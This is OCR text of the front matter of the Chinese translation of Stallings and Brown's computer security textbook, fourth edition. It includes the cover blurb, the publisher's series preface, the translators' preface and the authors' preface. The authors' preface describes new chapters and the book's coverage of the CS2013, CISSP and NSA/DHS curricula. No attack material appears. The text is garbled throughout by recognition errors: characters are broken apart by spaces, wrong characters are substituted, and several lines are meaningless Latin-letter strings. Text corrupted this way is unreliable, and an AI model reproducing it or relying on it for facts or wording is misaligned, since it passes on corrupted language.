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计算 机 安全 与 网 络 安全 已 经 成 为 高 校 网 络 空 间 安 全 、 计 算 机 及 相关 学 科 的 重要 教学 内 容 。 该 领域 涵盖 
的 知识 面 广 、 技 术 发 展 迅 速 ， 因 此 教学 难度 很 大 ， 本 书 正 是 为 满足 这 一 需求 而 编写 的 。 本 书 作 者 William 
Stallings 博 士 和 Lawrie Brown 博 士 有 丰富 的 学 术 和 专业 经 验 ， 自 2007 年 出 版 本 书 第 1 版 以 来 ， 始 终 以 理论 
和 实践 并 重 作为 核心 目标 ， 系 统 地 介绍 计算 机 安全 领域 的 各 个 方面 ， 全 面 分 析 计 算 机 安全 领域 的 威胁 、 检 
测 与 防范 安全 攻击 的 技术 、 方 法 以 及 软件 安全 问题 和 管理 问题 ， 并 反映 计算 机 安全 领域 的 最 新 发 展 和 技术 
趋势 。 


本 书 特点 
o 对 计算 机 安全 和 网 络 安全 领域 的 相关 主题 进行 了 广泛 而 深入 的 探讨 ， 同 时 反映 领域 的 最 新 进展 。 内 容 


CISSP 认 证 要 求 掌 握 的 知识 点 。 

e 从 计算 机 安全 的 核心 原理 、 设 计 方 法 、 标 准 和 应 用 四 个 维度 着 手 组 织 内 容 ， 不 仅 强调 核心 原理 及 其 在 
实践 中 的 应 用 ， 还 探讨 如 何 用 不 同 的 设计 方法 满足 安全 需求 ， 阅 释 对 于 当前 安全 解决 方案 至 关 重要 的 
标准 ， 并 通过 大 量 实例 展现 如 何 运 用 相关 理论 解决 实际 问题 。 

o 除了 经 典 的 计算 机 安全 的 内 容 ， 本 书 紧密 追踪 安全 领域 的 发 展 ， 完 善 和 补充 对 数据 中 心安 全 、 恶 意 软 


探讨 。 

。 本 书 提供 丰富 的 实际 动手 项 目 和 在 线 学 习 资源 ， 帮 助 读者 巩固 所 学 知识 。 这 些 项 目 涉及 网 络 攻防 、 安 
全 评估 、 防 火 墙 、 安 全 主题 研究 、 安 全 编程 等 。 读 者 和 用 书 教师 可 从 作者 网 站 或 华章 网 站 获得 相关 的 
辅助 学 习 资源 。 
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文艺 复兴 以 来 ， 源 远 流 长 的 科学 精神 和 逐步 形成 的 学 术 规范 ， 使 西方 国家 在 目 然 科 学 的 
各 个 领域 取得 了 垄断 性 的 优势 ; 也 正 是 这 样 的 优势 ， 使 美国 在 信息 技术 发 展 的 六 十 多 年 间 名 
家 辈出 、 独 领 风 骚 。 在 商业 化 的 进程 中 ， 美 国 的 产业 界 与 教育 界 越 来 越 紧密 地 结合 ， 计 算 机 
学 科 中 的 许多 泰山 北斗 同时 身 处 科研 和 教学 的 最 前 线 ， 由 此 而 产生 的 经 典 科学 著作 ， 不 仅 璧 
男 了 研究 的 范畴 ， 还 揭示 了 学 术 的 源 变 ， 既 遵循 学 术 规 范 ， 又 目 有 学 者 个 性 ， 其 价值 并 不 会 
因 年 月 的 流逝 而 减退 。 

近年 ， 在 全 球 信息 化 大 潮 的 推动 下 ,我 国 的 计算 机 产业 发 展 迅 猛 ， 对 专业 人 才 的 需求 日 
益 人 迫切 。 这 对 计算 机 教育 界 和 出 版 界 都 既是 机 遇 ， 也 是 挑战 ; 而 专业 教材 的 建设 在 教育 战略 
上 显得 举足轻重 。 在 我 国信 息 技 术 发 展 时 间 较 短 的 现状 下 ， 美 国 等 发 达 国 家 在 其 计算 机 科学 
发 展 的 几 十 年 间 积 淀 和 发 展 的 经 典 教材 仍 有 许多 值得 借鉴 之 处 。 因 此 ， 引 进 一 批 国外 优秀 计 
算 机 教材 将 对 我 国 计 算 机 教育 事业 的 发 展 起 到 积极 的 推动 作用 ， 也 是 与 世界 接轨 、 建 设 真正 
的 世界 一 流 大 学 的 必由之路 。 

机 械 工 业 出 版 社 华章 公司 较 早 意识 到 “出 版 要 为 教育 服务 ”。 目 1998 年 开始 ， 我 们 
就 将 工作 重点 放 在 了 直选、 移 译 国外 优秀 教材 上。 经 过 多 年 的 不 懈 努 力 ， 我 们 与 Pearson、 
McGraw-Hill, Elsevier, MIT, John Wiley & Sons, Cengage 等 世界 著名 出 版 公司 建立 了 良 
好 的 合作 关系 ， 从 它们 现 有 的 数 百 种 教材 中 枉 选 出 Andrew S. Tanenbaum, Bjarne Stroustrup, 
Brian W. Kernighan, Dennis Ritchie, Jim Gray, Afred V. Aho, John E. Hopcroft Jeffrey 
D. Ullman, Abraham Silberschatz, William Stallings, Donald E. Knuth, John L. Hennessy, 
Larry L. Peterson 等 大 师 名 家 的 一 批 经 典 作 品 ， 以 “计算 机 科学 丛书 ”为 总 称 出 版 ， 供 读者 
学 习 、 研 究 及 珍藏 。 大 理 石 纹理 的 封面 ， 也 正体 现 了 这 套 丛 书 的 品位 和 格调 。 

“计算 机 科学 丛书 ”的 出 版 工作 得 到 了 国内 外 学 者 的 易 力 相助 ， 国 内 的 专家 不 仅 提 供 了 
中 肯 的 选 题 指导 ， 还 不 酬劳 苗 地 担任 了 翻译 和 审 校 的 工作 ; 而 原 书 的 作者 也 相当 关注 其 作品 
在 中 国 的 传播 ， 有 的 还 专门 为 其 书 的 中 译本 作 序 。 迄 今 ,“ 计 算 机 科学 丛书 ”已 经 出 版 了 近 
500 个 品种 ， 这 些 书 籍 在 读者 中 树立 了 良好 的 口碑 ， 并 被 许多 高 校 采 用 为 正式 教材 和 参考 书 
籍 。 其 影印 版 “经 典 原版 书库 ”作为 姊妹 篇 也 被 越 来 越 多 实施 双语 教学 的 学 校 所 采用 。 

权威 的 作者 、 经 典 的 教材 、 一 流 的 译 者 、 严 格 的 审 校 、 精 细 的 编辑 ， 这 些 因 素 使 我 们 的 
图 书 有 了 质量 的 保证 。 随 着 计算 机 科学 与 技术 专业 学 科 建 设 的 不 断 完善 和 教材 改革 的 逐渐 
深化 ,教育 界 对 国外 计算 机 教材 的 需求 和 应 用 都 将 步 人 一 个 新 的 阶段 ， 我 们 的 目标 是 尽 善 尽 
美 ， 而 反馈 的 意见 正 是 我 们 达到 这 一 终极 目标 的 重要 帮助 。 华 章 公司 欢迎 老师 和 读者 对 我 们 
的 工作 提出 建议 或 给 予 指正 ， 我 们 的 联系 方法 如 下 : 

华章 网 站 :， www.hzbook.com 


电子 邮件 ，hzjsj@hzbook.com 
联系 电话 : (010) 88379604 





HZ BOOKS 


联系 地 址 ;: 北京 市 西城 区 百 万 庄 南 街 1 号 华章 教育 
邮政 编码 ，100037 华章 科技 图 书 出 版 中 心 
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在 全 球 信息 化 大 潮 的 推动 下 ， 计 算 机 与 网 络 技术 迅速 发 展 并 得 到 广泛 的 应 用 ， 而 今 已 经 
渗透 到 整个 社会 的 各 个 领域 ， 从 根本 上 改变 了 人 们 的 生活 和 工作 方式 ， 人 们 对 计算 机 和 网 络 的 
依赖 程度 日 益 增 强 。 与 此 同时 ， 由 于 计算 机 在 政治 、 经 济 和 国防 等 国家 关键 领域 中 的 应 用 ， 使 
得 计算 机 安全 问题 越 来 越 受到 人 们 的 关注 。 计 算 机 信息 系统 的 脆弱 性 ， 必 然 会 导致 信息 化 社会 
的 脆弱 性 。 目 前 ， 世 界 各 国 计 算 机 犯罪 案件 的 不 断 增 加 ， 就 充分 说 明了 计算 机 安全 问题 的 严重 
性 。 因 此 ， 人 们 对 教育 中 计算 机 安全 及 相关 主题 的 关注 程度 与 日 俱 增 。 计 算 机 安全 理论 和 技术 
已 经 成 为 信息 科学 与 技术 中 极为 重要 的 研究 领域 。 

为 了 满足 人 们 对 计算 机 安全 知识 教育 的 需求 ， 近 年 来 国内 出 版 了 许多 有 关 密 码 学 、 计 算 机 
网 络 安全 和 计算 机 系统 方面 的 专业 书籍 、 教 材 和 科普 读物 等 ， 特 别 是 随 着 许多 高 校 中 信息 安全 
专业 的 创建 ， 国 内 出 版 了 多 套 信息 安全 专业 教材 。 这 无 疑 对 计算 机 安全 教育 起 到 了 非常 重要 的 
作用 。 但 很 少 有 这 样 一 本 参考 书 : 它 完全 涵盖 计算 机 安全 的 各 个 领域 ， 不 但 包括 相关 的 技术 和 
应 用 方面 的 内 容 ， 还 包含 管理 方面 的 内 容 ， 使 得 任何 一 个 从 事 计算 机 安全 领域 研究 和 学 习 的 人 
都 能 从 中 获取 自己 关心 的 知识 ; 它 深入 浅 出 ， 无 论 是 初 涉 计算 机 安全 领域 的 学 生 ， 还 是 专业 技 
术 人 员 或 者 学 术 研 究 人 员 ， 阅 读 之 后 都 会 受益 菲 浅 ; EAA ra, 反映 了 计算 机 安全 领域 技术 
与 管理 的 发 展现 状 。 本 书 就 是 这 样 一 本 具备 了 上 述 特点 的 非常 有 价值 的 参考 书 ， 既 可 以 作为 教 
材 ， 也 可 供 技术 人 员 参 考 。 

很 多 阅读 过 计算 机 数据 通信 和 与 网 络 领域 相关 书籍 的 读者 可 能 已 经 对 威廉 . 斯 托 林 斯 
( William Stallings) 这 个 名 字 耳 熟 能 详 ， 本 书 是 威廉 ' 斯 托 林 斯 的 又 一 力作 。 威 廉 : 斯 托 林 斯 
早年 获得 了 膝 省 理工 学 院 计 算 机 科学 博士 学 位 。 他 是 世界 知名 计算 机 学 者 和 畅销 教材 作者 ， 已 
经 撰写 了 18 部 著作 ， 出 版 了 70 多 本 书籍 ， 内 容 涉及 计算 机 安全 、 计 算 机 网 络 和 计算 机 体系 结 
构 等 领域 ， 堪 称 计 算 机 界 的 全 才 。 在 过 去 的 30 多 年 中 ， 威廉: 斯 托 林 斯 博士 曾经 多 次 获得 由 
美国 “教材 和 学 术 专 著作 者 协会 ”颁发 的 “年 度 最 佳 计 算 机 科学 教材 ” 奖 。 目 前 ,威廉 : 斯 
托 林 斯 博士 还 创建 并 维护 着 计算 机 科学 学 生 资 源 网 站 ( Computer Science Student Resource Site) 
ComputerScienceStudent.com。 这 个 网 站 为 学 习 计 算 机 科学 的 学 生 以 及 专业 技术 人 员 提 供 了 各 
种 主题 的 相关 文档 和 链接 ， 供 他 们 在 学 习 和 研究 过 程 中 参考 。 

本 书 的 特点 是 内 容 详 尽 、 履 盖 面 广 ， 阐 述 条 理 清 晰 、 深 入 浅 出 、 易 于 理解 ， 系 统 地 概览 了 
计算 机 安全 领域 的 最 新 发 展 状 况 和 趋势 。 通 过 阅读 本 书 ， 读 者 可 以 全 面 、 深 入 地 了 解 计 算 机 安 
全 领域 中 涉及 的 绝 大 部 分 知识 。 

本 书 第 4 版 在 第 1 版 、 第 2 版 和 第 3 版 的 基础 上 对 内 容 进 行 了 修订 ， 特别 补充 了 计算 机 安 
全 领域 的 新 进展 和 新 技术 ， 并 对 前 三 版 的 内 容 进行 了 优化 ， 使 内 容 更 为 系统 和 紧凑 ， 更 适合 读 
者 阅读 或 参考 。 

全 书 共 包 含 以 下 五 个 部 分 : 第 一 部 分 “计算 机 安全 技术 与 原理 "， 涵 盖 支 持 有 效 安全 策略 
所 必需 的 所 有 技术 领域 ; 第 二 部 分 “软件 和 系统 安全 ”， 主 要 涉及 软件 开发 和 运行 带 来 的 安全 
问题 及 相应 的 对 策 ; 第 三 部 分 “管理 问题 ”， 主 要 讨论 信息 安全 与 计算 机 安全 在 管理 方面 的 问 
题 ， 以 及 与 计算 机 安全 相关 的 法 律 和 道德 方面 的 问题 ; 第 四 部 分 “密码 编码 算法 ”， 包 括 各 种 
类 型 的 加 密 算法 和 其 他 类 型 的 加 密 算 法 ; 第 五 部 分 “网 络 安全 ”， 关 注 的 是 为 在 Intemet 上 进行 
通信 提供 安全 保障 的 协议 和 标准 及 无 线 网 络 安全 等 问题 。 此 外 ， 各 章 后 面 都 有 一 定数 量 的 习题 


和 复习 题 供 读者 练习 ， 以 加 深 对 书 中 内 容 的 理解 。 同 时 ， 各 章 后 面 还 附 上 了 一 些 极 有 价值 的 参 
考 文献 ， 利 用 这 些 资 源 ， 有 兴趣 的 读者 可 以 进一步 对 计算 机 安全 方面 的 一 些 技术 细节 进行 深信 
学 习 和 研究 。 

APh Oe te Ha Al irs SFE, PEN AR TR RR, EEK at a, Bia 
W, EPE, SE) oS, Ses ABT. Meee. Sel. Baik, BA, FHE, B 
HE, FLEA SSS FRO PER BOT TE. EP h Be ie A ies BS St hi A 
校 。 在 翻译 过 程 中 ， 我 们 对 书 中 明显 的 错误 做 了 修正 。 本 书 的 翻译 得 到 了 机 械 工 业 出 版 社 华章 
公司 温 莉 芳 总 编辑 、 朱 动 编辑 的 关注 和 文 持 ， 在 此 表示 感谢 。 

翻译 国外 著名 作家 的 经 典 书籍 是 极 具 挑战 性 的 ， 因 为 经 典 书籍 不 仅 具 有 深度 ， 在 内 容 上 也 
各 具 特 色 ， 篆 常 引经据典 ， 这 对 我 们 的 翻译 工作 产生 了 不 小 的 压力 。 我 们 本 着 对 读者 认真 负责 
的 宗旨 ， 力 求 做 到 技术 内 池 的 准确 无 误 以 及 专业 术语 的 规范 统一 ， 力 求 达到 “ 信 达 雅 ” 的 翻译 
水 准 。 但 是 ， 限 于 译 者 水 平 ， 加 之 时 间 仓促 ， 翻 译 不 有 和 玻 漏 之 处 在 所 难免 ， 敬 请 阅读 本 书 的 
读者 予以 批评 指正 。 


译 者 
于 天 津南 开园 
2018 年 11 月 


前 言 | 


Computer Security: Principles and Practice, 4th Edition 


第 4 版 新 增 内 容 


自 本 书 第 3 版 出 版 以 来 ,计算 机 安全 领域 又 持续 出 现 了 一 些 改进 和 创新 。 在 新 版 本 中 ， 我 
们 试图 展现 这 些 改进 和 创新 ， 同 时 ， 力 求 在 深度 和 广度 上 涵盖 整个 计算 机 安全 领域 。 在 第 4 版 
修订 之 初 ， 许 多 讲授 该 领域 课程 的 教授 和 从 事 该 领域 工作 的 专业 人 士 又 重新 仔细 地 审查 了 本 书 
的 第 3 版 。 第 4 版 修订 和 完善 了 其 中 多 处 描述 ， 并 对 相关 的 图 表 进 行 了 改进 。 

除了 这 些 适 用 于 教学 和 便于 阅读 方面 的 改进 外 ， 本 书 也 对 一 些 实质 性 的 内 容 进 行 了 修订 。 
下 面 列 出 的 是 其 中 一 些 较 显著 的 修订 : 

。 数据 中 心安 全 : 第 5 章 增 加 了 一 节 有 关 数 据 中 心安 全 的 内 容 ， 其 中 包括 有 关 可 靠 性 等 
级 的 TIA-942 标准 的 内 容 。 
恶意 软件 : 在 第 6 章 中 ， 对 有 关 恶 意 软件 的 内 容 进行 了 修订 ， 包含 了 宏 病 毒 及 其 结构 
的 相关 内 容 ， 因 为 现在 它们 是 病毒 恶意 软件 的 最 为 常见 的 形式 。 
虚拟 化 安全 : 考虑 到 组 织 和 云 计算 环境 中 对 虚拟 化 系统 的 使 用 越 来 越 多 ， 在 第 12 章 中 对 
有 关 虚 拟 化 安全 的 内 容 进行 了 扩展 ， 增 加 了 用 于 增强 这 些 环境 安全 的 虚拟 防火 墙 的 讨论 。 
。 云 安 全 : 第 13 章 新 增 了 有 关 云 安全 的 讨论 ， 包 括 云 计 算 的 介绍 、 云 安全 的 关键 概念 、 
云 安 全 方法 的 分 析 和 一 个 开源 的 示例 。 
loT 安全 : 第 13 章 新 增 了 有 关 物 联网 (Internet of Things，IoT) 安全 的 讨论 ,包括 IoT 
介绍 、IoT 安全 问题 综述 和 一 个 开源 的 示例 。 
e SEIM: 第 18 草 更 新 了 有 关 安 全 信息 和 事件 管理 (SIME) 系统 的 讨论 。 
隐私 : 第 19 章 针 对 隐私 问题 及 其 管理 增加 了 有 关 道 德 和 法 律 方法 的 讨论 ， 以 及 与 大 数 
据 相 关 的 隐私 问题 。 
认证 加 密 : 认证 加 密 已 经 成 为 各 种 应 用 和 协议 中 日 益 广 泛 使 用 的 加 密 工具 。 第 21 章 新 
增 了 有 关 认 证 描述 的 讨论 ， 并 描述 了 一 个 重要 的 认证 加 密 算法 一 一 分 支 编码 本 ( Offset 
CodeBook, OCB) 模式 。 


背景 


近年 来 ， 在 高 等 教育 中 对 计算 机 安全 及 相关 主题 的 关注 程度 与 日 俱 增 。 导 致 这 一 状况 的 因 
素 很 多 ， 以 下 是 其 中 两 个 突出 的 因素 

1 ) 随 着 信息 系统 、 数 据 库 和 基于 Internet 的 分 布 式 系统 与 通信 广泛 应 用 于 商业 领域 ， 再 
加 上 各 种 与 安全 相关 的 攻击 愈演愈烈 ， 各 类 组 织 机 构 开 始 意 识 到 必须 拥有 一 个 全 面 的 信息 安全 
策略 。 这 个 策略 包括 使 用 特定 的 软 硬 件 和 培训 专业 人 员 等 。 

2) 计算 机 安全 教育 ， 也 就 是 通常 所 说 的 信息 安全 教育 ( Information Security Education) 或 
者 信息 保障 教育 ( Information Assurance Education)， 由 于 与 国防 和 国土 安全 密切 相关 ， 在 美国 
和 其 他 许多 国家 已 经 成 为 一 个 国家 目标 。NSA/DHS 信息 保障 /网 络 防御 国家 卓越 学 术 中 心 以 
政府 的 号 份 负责 计算 机 安全 教育 标准 的 制定 。 

由 此 可 预见 ， 关 于 计算 机 安全 的 课程 在 大 学 、 社 区 学 院 和 其 他 与 计算 机 安全 及 相关 领域 相 
关 的 教育 机 构 中 会 越 来 越 多 。 


Vil 


目标 
本 书 的 目标 是 概览 计算 机 安全 领域 的 最 新 发 展 状 况 。 计 算 机 安全 设计 者 和 安全 管理 者 关注 
的 问题 主要 包括 : 定义 计算 机 和 网 络 系统 面临 的 威胁 ， 评 佑 这 些 威胁 可 能 导致 的 风险 ， 以 及 制 
定 应 对 这 些 威胁 的 恰当 的 、 便 于 使 用 的 策略 。 
本 书 将 就 以 下 主题 进行 讨论 : 
。 原理 : 虽然 本 书 涉及 的 范围 很 广 ,但 有 一 些 基本 原理 会 重复 出 现在 一 些 领域 中 ， 比 如 
有 关 认 证 和 访问 控制 的 原理 。 本 书 重点 介绍 了 这 些 原理 并 且 探 讨 了 这 些 原 理 在 计算 机 
安全 的 一 些 特殊 领域 中 的 应 用 。 
。 设计 方法 : 本 书 探讨 了 多 种 满足 某 一 方面 的 计算 机 安全 需求 的 方法 。 
。 标准 : 在 计算 机 安全 领域 ， 标 准将 越 来 越 重 要 ， 甚 至 会 处 于 主导 地 位 。 要 想 对 茶 项 技术 
当前 的 状 次 和 未 来 的 发 展 趋势 有 正确 的 认识 ， 需 要 充分 理解 与 该 项 技术 相关 的 标准 。 
。 实例 : 书 中 的 许多 章 中 都 包含 一 节 来 展示 相关 原理 在 真实 环境 中 的 应 用 情况 。 


对 ACM/IEEE 计算 机 科学 课程 2013 的 支持 


本 书 是 为 学 术 研 究 人 员 和 专业 技术 人 员 编 写 的 。 作 为 教科 书 ， 它 面向 的 对 象 主要 是 计算 
机 科学 、 计 算 机 工程 和 电子 工程 专业 的 本 科 生 ， 授 课时 间 可 以 是 一 或 两 个 学 期 。 本 书 第 4 版 
的 设计 目标 是 支持 ACM/IEEE 计算 机 科学 课程 2013 (CS2013 ) 推荐 的 内 容 。CS2013 课程 推 
荐 的 内 容 首次 包含 了 信息 保障 和 安全 (IJAS)， 将 其 作为 知识 领域 列 人 计算 机 科学 知识 体系 之 
中 。CS2013 将 所 有 需要 讲授 的 课程 内 容 分 为 三 类 : 核心 1 级 (所 有 的 主题 都 应 涵盖 在 课程 
体系 中 )， 核心 2 级 (全 部 或 大 部 分 主题 应 当 包 含 在 课程 体系 中 )， 选 修 内 容 (具有 一 定 广度 和 
深度 的 选修 主题 )。 在 IAS 领域 中 ，CS2013 包含 3 个 核心 1 级 的 主题 、5 个 核心 2 级 的 主题 和 
许多 选修 主题 ， 每 一 个 主题 都 包含 一 些 子 主题 。 本 书包 含 CS2013 的 核心 1 级 和 核心 2 级 的 全 
部 内 容 ， 同 时 也 包含 了 CS2013 的 许多 选修 主题 。 表 P-1 列 出 了 本 书包 含 的 关于 IAS 知识 领域 
的 内 容 。 


表 P-1 本 书包 含 的 CS2013 IAS 知识 领域 的 内 容 


CIA (机 密 性 、 完 整 性 和 可 用 性 ) 

风险 、 威 胁 、 脆 弱点 和 攻击 向 量 

认证 与 授权 ， 访 问 控制 (强制 的 与 自主 的 ) $1.3. 4. 19 
信任 和 可 信 度 

道德 (责任 公开 ) 


最 小 特权 和 隔离 
安全 缺 省 设置 
开放 式 设 计 
安全 设计 原则 ( 1 级 ) 端 到 端 安全 第 1 章 


安全 的 基本 概念 ( 1 级 ) 


深度 防御 
设计 安全 
安全 和 其 他 设计 目标 的 权衡 


绝对 中 介 

被 审核 的 安全 组 件 的 使 用 

经 济 机 制 (减少 可 信 计 算 基 ， 最 小 化 攻击 面 ) 第 1 意 
可 用 安全 

安全 组 合 性 

防御 、 检 测 和 威慑 


安全 设计 原则 ( 2 级 ) 





VIH 


( 续 ) 


IAS 知识 单元 APES AR 


输入 检验 和 数据 清洗 

选择 编程 语言 和 类 型 安全 语言 

输入 检验 和 数据 清洗 错误 案例 (缓冲 区 溢出 、 整 
数 错误 、SQL 注入 和 XSS 漏洞 ) 

竞 态 条 件 

正确 处 理 异常 和 非 预 期 行为 


第 三 方 组 件 的 正确 使 用 
有 效 进行 安全 更 新 第 11、12 章 


防御 性 程序 设计 ( 1 级 ) 第 11 章 


防御 性 程序 设计 ( 2 级 ) 


攻击 者 的 目标 、 能 力 和 动机 
恶意 软件 


威胁 和 攻击 ( 2 级 ) 拒绝 服务 和 分 布 式 拒绝 服务 第 6、7 章 


社会 工程 学 


网 络 特定 威胁 和 攻击 类 型 
使 用 密码 学 保证 数据 和 网 络 安全 | l 
网 络 安全 (24) 安全 网 络 架构 eae 
防御 机 制 和 对 策 
无 线 网 络 、 蜂 帘 式 网 络 安 全 
基本 密码 学 术语 
密码 种 类 第 2 章 以 及 
密码 学 (2 级 | 数学 基础 概述 第 四 部 分 
公 钥 基础 设施 


覆盖 CISSP 科目 领域 情况 


本 书 涵 盖 了 CISSP (注册 信息 系统 安全 师 ) 认证 所 规定 的 所 有 科目 领域 。 国 际 信息 系统 安 
全 认证 协会 (简称 (ISC)- ) 所 设立 的 CISSP 认证 被 认为 是 信息 安全 领域 认证 中 的 “黄金 准 
则 ”。CISSP 认证 是 安全 产业 唯一 一 个 被 广泛 认可 的 认证 ,包括 美国 国防 部 和 许多 金融 机 构 在 
内 的 组 织 机 构 ， 时 下 都 要 求 其 网 络 安全 部 门 的 人 员 具 有 CISSP 认证 资格 。2004 年 ，CISSP 成 
为 首 个 获取 ISO/IEC 17024 (《 General Requirements for Bodies Operating Certification of Persons 》) 
官方 认证 的 信息 技术 项 目 。 

CISSP 考试 基于 公共 知识 体系 (CBK)， 信 息 安全 实践 大 纲 由 国际 信息 系统 安全 认证 协 
会 开发 和 维护 ， 这 是 一 个 非 营利 组 织 。CBK 制定 了 组 成 CISSP 认证 要 求 的 知识 体系 的 8 个 
领域 。 

这 8 个 领域 均 包含 在 本 书 中 ， 具 体 如 下 : 

。 安全 和 风险 管理 : 机密 性 、 完 整 性 和 可 用 性 概念 ; 安全 管理 原则 ; 风险 管理 ; 合 规 性 ; 
法 律 和 法 规 问题 ;职业 道德 ; 安全 策略 、 标 准 、 规 程 和 指南 。( 第 14 章 ) 
资产 安全 : 信息 和 资产 分 类 ; 所 有 权 (如 数据 所 有 者 、 系 统 所 有 者 ); 隐私 保护 ; 适当 
存留 ; 数据 安全 控制 ; 处 置 要 求 (如 标记 、 标 注 和 存储 )。( 第 5、15、16、19 章 ) 
安全 工程 : 使 用 安全 设计 原则 的 工程 过 程 ; 安全 模型 ; 安全 评估 模型 ;信息 系统 安全 
功能 ; 安全 架构 、 设 计 和 解决 方案 元 素 漏 洞 ; 基于 Web 的 系统 漏洞 ;移动 系统 漏洞 ; 
舱 入 式 设备 和 信息 物理 系统 漏洞 ; 密码 学 ; 场地 和 设施 设计 的 安全 原则 ; 物理 安全 。( 第 
I 2. 13, 15. 16%) 
通信 和 网 络 安全 : 安全 网 络 架构 设计 (例如 ，IP 和 非 IP 协议 、 分 段 ); 安全 网 络 组 件 ; 
安全 通信 信道 ; 网 络 攻击 。( 第 五 部 分 ) 





。 身份 和 访问 管理 : WHE, 人 和 设备 的 身份 识别 和 认证 ; 里 份 即 服务 ( 例 
如 ， 云 身份 ); 第 三 方 身份 服务 (例如 ， 本 地 服务 ); 访问 控制 攻击 ; 身份 和 访问 配置 生 
命 周 期 (例如 ， 配 置 审查 )。( 第 3、4、8、9 章 ) 

。 安全 评估 与 测试 : 评估 与 测试 策略 ; 安全 过 程 数 据 (例如 ， 管 理 和 运行 控制 ); 安全 控 
制 测 试 ; 测试 输出 (例如 ， 自 动 化 方式 、 手 工 方式 ); 安全 架构 漏洞 。( 第 14、15、18 章 ) 

。 安全 运营 : 调查 支持 和 需求 ; 日 志和 监视 活动 ; 资源 配置 ; 基本 安全 操作 概念 ; 资源 
保护 技术 ; 事故 管理 ; 预防 法 ;补丁 和 漏洞 管理 ; 变更 管理 过 程 ; 恢复 策略 ; 灾难 恢 
复 过 程 和 计划 ; 业务 连续 性 计划 和 演练 ; 物理 安全 ; 个 人 安全 问题 。( 第 11、12、15、 
16, 17#) 

。 软件 开发 安全 : 软件 开发 生命 周期 中 的 安全 ; 开发 环境 安全 控制 ; 软件 安全 有 效 性 ; 
获取 软件 安全 影响 。( 第 二 部 分 ) 


支持 NSA/DHS 认证 
美国 国家 安全 局 (NSA) 和 美国 国土 安全 部 (DHS) 联合 创建 了 信息 保障 / 网络 防御 国家 


ARZA D (The National Centers of Academic Excellence in Information Assurance/Cyber 
Defense(IA/CD))。 创建 这 个 中 心 的 目标 是 ,通过 促进 IA 领域 内 高 等 教育 和 科研 的 发 展 ， 以 
及 培养 一 批 在 各 个 学 科 中 具有 IA 专门 知识 的 专业 人 员 ， 尽 量 减少 本 国信 息 基 础 设施 所 存在 
的 缺陷 。 为 了 实现 这 个 目标 ,美国 国家 安全 局 / 国土 安全 部 为 一 些 两 年 制 和 四 年 制 的 机 构 定 
义 了 一 组 知识 单元 ， 这 些 知识 单元 必须 包含 在 课程 体系 中 ， 这 样 可 以 将 它们 纳入 IA/CD 中 
的 NSA/DHS 的 国家 卓越 学 术 中 心 项 目 。 每 一 个 知识 单元 都 由 要 求 涵盖 的 最 基本 的 一 些 主题 
及 一 个 或 多 个 学 习 目 标 构成 。 是 否 纳入 项 目 取决 于 其 是 否 具有 一 定数 量 的 核心 和 可 选 知识 
单元 。 
在 计算 机 安全 领域 ，2014 年 的 知识 单元 (Knowledge Unit) 文件 列举 了 以 下 核心 单元 : 
。 网络 防 御 : 包括 访问 控制 、 密 码 学 、 防 火 墙 、 人 侵 检测 系统 、 恶 意 活动 检测 及 其 应 对 
faith. (ATER AW RR TH. 
。 网络 威胁 : 包括 攻击 类 型 、 法 律 问题 、 攻 击 面 、 攻 击 树 、 内 部 人 员 问 题 以 及 威胁 信 
i. 
。 基本 安全 设计 原则 : 共 包 含 12 条 原则 ， 这 些 原则 将 在 本 书 的 1.4 市 中 阐述 。 
。 信息 保障 基本 原理 : 包括 威胁 与 脆弱 性 、 入 侵 检测 与 防御 系统 、 密 码 学 、 访 问 控制 模 
型 、 身 份 识别 /认证 、 审 计 。 
。 密码 学 导论 : 包括 对 称 密码 学 、 公 钥 密 码 学 、 散 列 函 数 、 数 字 签 名 。 
。 数据 库 : 包括 数据 库 概 述 、 数 据 库 访 问 控制 以 及 推理 的 安全 问题 。 
本 书 广泛 地 涵盖 了 以 上 这 些 领域 。 此 外 ， 本 书 还 涉及 部 分 可 选 知 识 单元 。 
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本 书 分 为 五 个 部 分 : 

。 计算 机 安全 技术 与 原理 
© 软件 和 系统 安全 

。 管理 问题 

。 密码 编码 算法 

。 网 络 安全 


本 书 还 配 有 一 些 在 线 章节 和 附录 ， 介 绍 一 些 选 定 的 主题 。 
本 书 附 有 和 常用 的 缩 略 语 表 和 参考 文献 。 此 外 ， 每 章 均 包括 习题 、 复 习题 和 关键 术语 。 


教学 辅助 材料 


本 书 的 主要 目标 是 尽 可 能 地 为 令 人 兴奋 的 、 高 速 发 展 的 信息 安全 学 科 提 供 一 个 有 效 的 教学 
工具 。 这 一 目标 不 仅 体现 在 本 书 的 组 织 结构 上 ， 也 体现 在 教学 辅助 材料 上 。 本 书 提供 了 以 下 补 
充 资 料 ， 以 便 教 师 组 织 教学 工作 。 

。 项目 手册 : 项 目 手册 包括 文档 和 便于 使 用 的 软件 ， 以 及 后 续 列 出 的 为 每 类 项 目 推荐 的 
项 目 任 务 。 
解决 方案 手册 : 每 草草 末 的 复习 题 和 习题 的 答案 或 解决 方案 。 

PPT 幻灯 片 : 池 盖 本 书 所 有 章节 的 约 灯 片 ， 适 合 在 教学 中 使 用 。 

PDF 文件 : 本 书 中 所 有 的 图 片 和 表格 。 

练习 库 : 每 草 都 有 一 组 用 于 练习 的 问题 。 

教学 大 纲 样 例 ， 本 书包 含 的 内 容 超出 了 一 学 期 所 能 讲授 的 内 容 。 为 此 ， 本 书 提供 了 一 
些 教学 大 纲 样 例 ， 目 的 是 为 教师 在 有 限时 间 内 使 用 本 书 提供 建议 ， 这 些 样 例 都 是 基于 
教授 使 用 本 书 以 前 版 本 的 真实 教学 经 历 给 出 的 。 

所 有 教 辅 材料 都 可 以 在 本 书 的 教师 资源 中 心 ( Instructor Resource Center, IRC) 获得 ， 可 以 
通过 出 版 商 网 站 www.pearsonhighered.com/stallings 或 者 点 击 本 书 的 网 站 WilliamStallings.com/ 
ComputerSecurity 中 的 Pearson Resources for Instructors 链接 获得 。 

男 外 ， 本 书 的 Web 站 点 WilliamStallings.com/ComputerSecurity (点 击 Instructor Resources 
链接 ) 还 为 教师 提供 了 下 列 支 持 : 

。 使 用 本 书 讲授 其 他 课程 的 网 站 链接 信息 。 
。 提供 给 使 用 本 书 的 教师 的 Internet 邮箱 列表 的 签名 信息 ， 这 使 得 使 用 本 书 的 教师 之 间 、 
教师 与 本 书 作 者 之 间 可 以 交换 信息 ， 交 流 对 本 书 的 建议 ， 探 讨 其 中 的 问题 等 。 

